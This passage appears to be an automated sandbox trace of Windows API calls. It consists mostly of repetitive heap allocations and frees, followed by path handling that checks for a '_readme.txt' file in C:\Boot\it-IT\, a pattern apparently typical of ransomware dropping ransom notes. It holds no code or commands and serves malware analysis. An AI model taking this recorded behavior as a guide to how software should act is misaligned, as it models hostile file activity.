hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.223] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0056.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.223] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.223] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.223] PathFindFileNameW (pszPath="") returned="" [0056.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.223] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.224] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3297a68 [0056.224] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0056.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.224] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.224] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0056.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.224] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0056.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.225] lstrcpyW (in: 